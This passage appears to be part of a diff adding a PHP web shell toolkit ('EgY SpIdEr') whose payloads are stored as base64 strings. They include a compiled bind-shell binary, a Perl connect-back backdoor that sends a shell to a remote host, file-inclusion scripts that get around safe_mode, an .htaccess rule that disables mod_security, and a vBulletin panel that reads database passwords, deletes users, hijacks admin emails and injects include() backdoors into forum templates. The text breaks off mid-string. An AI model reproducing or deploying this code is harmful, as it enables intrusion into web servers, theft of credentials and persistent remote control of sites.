bGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+$back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0=";
+$egy_ini="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4=";
+$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
+$egy_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4=";
+$egy_vb="DQo8aHRtbD48aGVhZD48dGl0bGU+RWdZIFNwSWRFciA8L3RpdGxlPg0KPFNUWUxFPg0KDQpCT0RZDQogew0KICAgICAgICBTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNIQURPVy1DT0xPUjogIzAwMDAwMDsgQ09MT1I6ICM2NjY2NjY7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjNzI2NDU2OyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICM3MjY0NTY7IFNDUk9MTEJBUi1UUkFDSy1DT0xPUjogIzI5MjkyOTsgRk9OVC1GQU1JTFk6IFZlcmRhbmE7IFNDUk9MTEJBUi1EQVJLU0hBRE9XLUNPTE9SOiAjNzI2NDU2DQp9DQoNCnRyIHsNCkJPUkRFUi1SSUdIVDogICNkYWRhZGEgOw0KQk9SREVSLVRPUDogICAgI2RhZGFkYSA7DQpCT1JERVItTEVGVDogICAjZGFkYWRhIDsNCkJPUkRFUi1CT1RUT006ICNkYWRhZGEgOw0KY29sb3I6ICNmZmZmZmY7DQp9DQp0ZCB7DQpCT1JERVItUklHSFQ6ICAjZGFkYWRhIDsNCkJPUkRFUi1UT1A6ICAgICNkYWRhZGEgOw0KQk9SREVSLUxFRlQ6ICAgI2RhZGFkYSA7DQpCT1JERVItQk9UVE9NOiAjZGFkYWRhIDsNCmNvbG9yOiAjZGFkYWRhOw0KfQ0KLnRhYmxlMSB7DQpCT1JERVI6IDE7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMDAwMDAwOw0KY29sb3I6ICMzMzMzMzM7DQp9DQoudGQxIHsNCkJPUkRFUjogMTsNCmZvbnQ6IDdwdCB0YWhvbWE7DQpjb2xvcjogI2ZmZmZmZjsNCn0NCi50cjEgew0KQk9SREVSOiAxOw0KY29sb3I6ICNkYWRhZGE7DQp9DQp0YWJsZSB7DQpCT1JERVI6ICAjZWVlZWVlICBvdXRzZXQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMDAwMDAwOw0KY29sb3I6ICNkYWRhZGE7DQp9DQppbnB1dCB7DQpCT1JERVItUklHSFQ6ICAjMDBGRjAwIDEgc29saWQ7DQpCT1JERVItVE9QOiAgICAjMDBGRjAwIDEgc29saWQ7DQpCT1JERVItTEVGVDogICMwMEZGMDAgMSBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMwMEZGMDAgMSBzb2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMzMzMzMzM7DQpmb250OiA5cHQgdGFob21hOw0KY29sb3I6ICNmZmZmZmY7DQp9DQpzZWxlY3Qgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxIHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxIHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzAwMDAwMDsNCmZvbnQ6IDlwdCB0YWhvbWE7DQpjb2xvcjogI2RhZGFkYTs7DQp9DQpzdWJtaXQgew0KQk9SREVSOiAgYnV0dG9uaGlnaGxpZ2h0IDEgb3V0c2V0Ow0KQkFDS0dST1VORC1DT0xPUjogIzI3MjcyNzsNCndpZHRoOiA0MCU7DQpjb2xvcjogI2RhZGFkYTsNCn0NCnRleHRhcmVhIHsNCkJPUkRFUi1SSUdIVDogICNmZmZmZmYgMSBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICM5OTk5OTkgMSBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICM5OTk5OTkgMSBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICNmZmZmZmYgMSBzb2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMzMzMzMzM7DQpmb250OiBGaXhlZHN5cyBib2xkOw0KY29sb3I6ICNmZmZmZmY7DQp9DQpCT0RZIHsNCm1hcmdpbjogMTsNCmNvbG9yOiAjZGFkYWRhOw0KYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCn0NCkE6bGluayB7Q09MT1I6cmVkOyBURVhULURFQ09SQVRJT046IG5vbmV9DQpBOnZpc2l0ZWQgeyBDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6YWN0aXZlIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6aG92ZXIge2NvbG9yOmJsdWU7VEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KDQo8L1NUWUxFPg0KPC9oZWFkPg0KIDxib2R5IGJnY29sb3I9IiMwMDAwMDAiIHRleHQ9ImxpbWUiIGxpbms9ImxpbWUiIHZsaW5rPSJsaW1lIj4NCiA8Y2VudGVyPg0KPD8NCiRhY3QgPSAkX0dFVFsnYWN0J107DQppZigkYWN0PT0ncmVjb25maWcnICYmIGlzc2V0KCRfUE9TVFsncGF0aCddKSkNCnsNCiRwYXRoID0gJF9QT1NUWydwYXRoJ107DQppbmNsdWRlICRwYXRoOw0KPz4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj48dGg+Ojo6OlJlYWQgQ29uZmlnIERhdGE6Ojo6PC90aD48dGg+PD8gZWNobyAnPGZvbnQgY29sb3I9eWVsbG93PicgLiAkcGF0aCAuICc8L2ZvbnQ+JzsgPz48L3RoPg0KPHRyPg0KPHRoPkhvc3QgOiA8L3RoPjx0aD48PyBlY2hvICc8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRjb25maWdbJ01hc3RlclNlcnZlciddWydzZXJ2ZXJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+VXNlciA6IDwvdGg+PHRoPjw/IGVjaG8gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3VzZXJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+UGFzcyA6IDwvdGg+PHRoPjw/DQokcGFzc3NxbCA9ICRjb25maWdbJ01hc3RlclNlcnZlciddWydwYXNzd29yZCddOw0KaWYgKCRwYXNzc3FsID09ICcnKQ0Kew0KJHJlc3VsdCA9ICc8Zm9udCBjb2xvcj1yZWQ+Tm8gUGFzc3dvcmQ8L2ZvbnQ+JzsNCn0gZWxzZSB7DQokcmVzdWx0ID0gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJHBhc3NzcWwgLiAnPC9mb250Pic7DQp9DQplY2hvICRyZXN1bHQ7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+TmFtZSA6IDwvdGg+PHRoPjw/IGVjaG8gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJGNvbmZpZ1snRGF0YWJhc2UnXVsnZGJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8L3RhYmxlPg0KPD8NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09ImRlbCIgICYmIGlzc2V0KCRfUE9TVFsndmJ1c2VyJ10pICkNCnsNCiAkaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmJ1c2VyID0gJF9QT1NUWyd2YnVzZXInXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRxdWVyeSA9ICdkZWxldGUgKiBmcm9tIHVzZXIgd2hlcmUgdXNlcm5hbWU9IicgLiAkdmJ1c2VyIC4gJyI7JzsNCiRyID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcikNCnsNCmVjaG8gJzxmb250IGNvbG9yPXllbGxvdz5Vc2VyIDogJyAuICR2YnVzZXIgLiAnIHdhcyBkZWxldGVkPC9mb250Pic7DQp9IGVsc2Ugew0KZWNobyAnPGZvbnQgY29sb3I9cmVkPlVzZXIgOiAnIC4gJHZidXNlciAuICcgY291bGQgbm90IGJlIGRlbGV0ZWQ8L2ZvbnQ+JzsNCn0NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09InNoZWxsIiAgJiYgaXNzZXQoJF9QT1NUWyd2YXInXSkpDQp7DQokaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmFyID0gJF9QT1NUWyd2YXInXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRXZHQgPSAnVVBEQVRFIGB0ZW1wbGF0ZWAgU0VUIGB0ZW1wbGF0ZWAgPSBcJyAiLnByaW50IGluY2x1ZGUoJEhUVFBfR0VUX1ZBUlNbJyAuICR2YXIgLiAnXSkuIiBcJ1dIRVJFIGB0aXRsZWAgPVwnRk9SVU1IT01FXCc7JzsNCiRXZHQyPSAnVVBEQVRFIGBzdHlsZWAgU0VUIGBjc3NgID0gXCcgIi5wcmludCBpbmNsdWRlKCRIVFRQX0dFVF9WQVJTWycgLiAkdmFyIC4gJ10pLiIgXCcsIGBzdHlsZXZhcnNgID0gXCdcJywgYGNzc2NvbG9yc2AgPSBcJ1wnLCBgZWRpdG9yc3R5bGVzYCA9IFwnXCcgOyc7DQokcmVzdWx0PW15c3FsX3F1ZXJ5KCRXZHQpOw0KICBpZiAoJHJlc3VsdCkge2VjaG8gIjxwPkRvbmUgRXhwbG9pdC48L3A+PGJyPlVzZSB0aGlzIDogPGJyPiBpbmRleC5waHA/IiAuICR2YXIgLiAiPXNoZWxsLnR4dCI7fWVsc2V7DQplY2hvICI8cD5FcnJvcjwvcD4iO30NCiRyZXN1bHQxPW15c3FsX3F1ZXJ5KCRXZHQyKTsNCiAgaWYgKCRyZXN1bHQxKSB7IGVjaG8gIjxwPkRvbmUgQ3JlYXRlIEZpbGU8L3A+PGJyPlVzZSB0aGlzIDogPGJyPiBpbmRleC5waHA/IiAuICR2YXIgLiAiPXNoZWxsLnR4dCI7fSBlbHNleyBlY2hvICI8cD5FcnJvcjwvcD4iO30NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09ImNvZGUiICAmJiBpc3NldCgkX1BPU1RbJ2NvZGUnXSkpDQp7DQokaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokaW5kZXggPSAkX1BPU1RbJ2NvZGUnXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRpbmRleCA9ICRfUE9TVFsnYiddOw0KJFdkdCA9ICdVUERBVEUgYHRlbXBsYXRlYCBTRVQgYHRlbXBsYXRlYCA9IFwnICcgLiAkaW5kZXggLiAnICBcJ1dIRVJFIGB0aXRsZWAgPVwnRk9SVU1IT01FXCc7JzsNCiRXZHQyPSAnVVBEQVRFIGBzdHlsZWAgU0VUIGBjc3NgID0gXCcgJyAuICRpbmRleCAuICcgXCcsIGBzdHlsZXZhcnNgID0gXCdcJywgYGNzc2NvbG9yc2AgPSBcJ1wnLCBgZWRpdG9yc3R5bGVzYCA9IFwnXCcgOyc7DQokcmVzdWx0PW15c3FsX3F1ZXJ5KCRXZHQpOw0KICBpZiAoJHJlc3VsdCkge2VjaG8gIjxwPkluZGV4IHdhcyBDaGFuZ2VkIFN1Y2NlZnVsbHk8L3A+Ijt9ZWxzZXsNCmVjaG8gIjxwPkZhaWxlZCB0byBjaGFuZ2UgaW5kZXg8L3A+Ijt9DQokcmVzdWx0MT1teXNxbF9xdWVyeSgkV2R0Mik7DQppZiAoJHJlc3VsdDEpIHtlY2hvICI8cD5Eb25lIENyZWF0ZSBGaWxlPC9wPiI7fSBlbHNleyBlY2hvICI8cD5FcnJvcjwvcD4iO30NCn0NCg0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0iaW5jIiAgJiYgaXNzZXQoJF9QT1NUWydsaW5rJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KJHZibGluayA9ICRfUE9TVFsnbGluayddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJGhhY2sxNSA9ICdVUERBVEUgYHRlbXBsYXRlYCBTRVQgYHRlbXBsYXRlYCA9IFwnJHNwYWNlcl9vcGVuDQp7JHtpbmNsdWRlKFwnXCcnIC4gJHZibGluayAuICdcJ1wnKX19eyR7ZXhpdCgpfX0mDQokX3BocGluY2x1ZGVfb3V0cHV0XCdXSEVSRSBgdGl0bGVgID1cJ0ZPUlVNSE9NRVwnOyc7DQokaGFjaz0gJ1VQREFURSBgc3R5bGVgIFNFVCBgY3NzYCA9IFwnJHNwYWNlcl9vcGVuDQp7JHtpbmNsdWRlKFwnXCcnIC4gJHZibGluayAuJ1wnXCcpfX17JHtleGl0KCl9fSYNCiRfcGhwaW5jbHVkZV9vdXRwdXRcJywgYHN0eWxldmFyc2AgPSBcJ1wnLCBgY3NzY29sb3JzYCA9IFwnXCcsIGBlZGl0b3JzdHlsZXNgID0gXCdcJyA7JzsNCiRyZXN1bHQ9bXlzcWxfcXVlcnkoJGhhY2sxNSkgb3IgZGllKG15c3FsX2Vycm9yKCkpOw0KJHJlc3VsdD1teXNxbF9xdWVyeSgkaGFjaykgb3IgZGllKG15c3FsX2Vycm9yKCkpOw0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0ibWFpbCIgICYmIGlzc2V0KCRfUE9TVFsndmJ1c2VyJ10pICAmJiBpc3NldCgkX1BPU1RbJ3ZibWFpbCddKSkNCnsNCiAkaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmJ1c2VyID0gJF9QT1NUWyd2YnVzZXInXTsNCiR2Ym1haWwgPSAkX1BPU1RbJ3ZibWFpbCddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJHF1ZXJ5ID0gJ3VwZGF0ZSB1c2VyIHNldCBlbWFpbD0iJyAuICR2Ym1haWwgLiAnIiB3aGVyZSB1c2VybmFtZT0iJyAuICR2YnVzZXIgLiAnIjsnOw0KJHJlID0gbXlzcWxfcXVlcnkoJHF1ZX